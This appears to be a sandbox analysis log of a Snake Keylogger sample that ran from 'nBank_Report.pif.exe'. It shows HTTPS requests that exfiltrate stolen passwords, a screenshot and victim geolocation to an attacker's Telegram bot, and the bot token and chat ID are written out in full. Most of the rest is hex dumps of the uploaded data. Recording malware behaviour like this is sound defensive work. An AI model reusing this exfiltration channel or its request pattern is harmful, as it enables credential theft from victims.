                                              2024-09-26 09:33:55 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:33:57 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:33:56 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.1049749149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:57 UTC324OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdf76cf5442d3
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              2024-09-26 09:33:57 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 37 36 63 66 35 34 34 32 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dcdf76cf5442d3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:33:58 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:33:58 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:33:58 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6333,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343238,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.1049750149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:59 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdf85526113d3
                                              Host: api.telegram.org
                                              Content-Length: 673736
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 38 35 35 32 36 31 31 33 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dcdf85526113d3Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:33:59 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:00 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
